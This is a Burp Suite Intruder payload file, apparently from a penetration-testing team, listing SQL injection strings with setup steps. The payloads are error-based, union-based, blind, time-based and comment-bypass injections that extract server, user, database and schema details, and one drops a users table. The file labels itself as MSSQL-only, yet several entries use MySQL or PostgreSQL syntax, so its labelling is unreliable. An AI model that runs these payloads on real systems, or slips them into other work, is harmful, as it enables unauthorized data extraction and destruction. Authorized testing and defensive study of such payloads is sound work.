# ============================================================================
# BURP SUITE INTRUDER PAYLOAD LIST
# Tool    : SQL Injection Payload Generator
# Author  : Offensive Team Zeta - ITSOLERA (PVT) LTD
# Created : 2026-02-20 18:30:04
# Target  : MSSQL database
# Usage   : Burp Suite > Intruder > Payloads > Load > (this file)
# WARNING : Use ONLY on authorized targets with written permission
# ============================================================================

# HOW TO USE:
#   1. Open Burp Suite → Proxy → Intercept a request
#   2. Right-click → Send to Intruder
#   3. Intruder → Positions → mark your injection point (Add §)
#   4. Intruder → Payloads → Payload type: Simple list
#   5. Click Load → select this file
#   6. Click Start Attack (authorized lab / DVWA ONLY)

# ============================================================================
# ERROR BASED — MSSQL
# ============================================================================
# [Easy] Extract MSSQL version through CONVERT error
1' AND CONVERT(int, @@version)--
# [Easy] Extract server name via CONVERT
1' AND CONVERT(int, (SELECT @@servername))--
# [Easy] Extract database name
1' AND CONVERT(int, (SELECT DB_NAME()))--
# [Medium] Extract current login user
1' AND CONVERT(int, (SELECT SUSER_NAME()))--
# [Hard] Extract version with conditional error
1' AND 1=(CASE WHEN @@version LIKE '%2019%' THEN 1 ELSE (SELECT @@version) END)--

# ============================================================================
# UNION BASED — MSSQL
# ============================================================================
# [Easy] Extract server, version, and database information
1' UNION SELECT @@servername, @@version, DB_NAME(), NULL--
# [Medium] Extract schema information from dbo tables
1' UNION SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='dbo'--
# [Medium] Extract user-defined table names
1' UNION SELECT name, NULL, NULL, NULL FROM sysobjects WHERE xtype='U'--
# [Hard] Aggregate all table names
1' UNION SELECT STRING_AGG(name, ', '), NULL, NULL, NULL FROM sys.tables--

# ============================================================================
# BOOLEAN BLIND — MSSQL
# ============================================================================
# [Hard] Boolean blind: Verify database accessibility
1' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
# [Hard] Boolean blind: Extract username length
1' AND (SELECT LENGTH(user())) > 5--
# [Very Hard] Boolean blind: Check username patterns
1' AND (SELECT COUNT(*) FROM users WHERE username LIKE 'a%') > 0--
# [Hard] Boolean blind: Table record counting
1' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 100 THEN 1 ELSE 0 END) = 1--

# ============================================================================
# TIME BASED — MSSQL
# ============================================================================
# [Hard] Time-based blind: Sleep function delay
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
# [Hard] Time-based blind: Conditional sleep based on count
1' AND IF((SELECT COUNT(*) FROM users) > 10, SLEEP(5), 0)--
# [Very Hard] Time-based blind: MSSQL WAITFOR command
1' OR 1=1; WAITFOR DELAY '00:00:05'--
# [Very Hard] Time-based blind: PostgreSQL pg_sleep function
1' AND (SELECT CASE WHEN (SUBSTRING(user(),1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END)--

# ============================================================================
# COMMENT BYPASS — MSSQL
# ============================================================================
# [Easy] Basic quote bypass without comments
1' OR '1'='1
# [Easy] Hash comment (#) bypass in MySQL
1' UNION SELECT NULL#
# [Easy] Block comment bypass (/*...*/)
1' UNION SELECT NULL,NULL/*
# [Medium] Stacked query comment bypass
1'; DROP TABLE users; --
# [Easy] PostgreSQL double-dash comment bypass
1' AND '1'='1' --
# [Easy] MSSQL comment bypass
1' OR '1'='1' /*

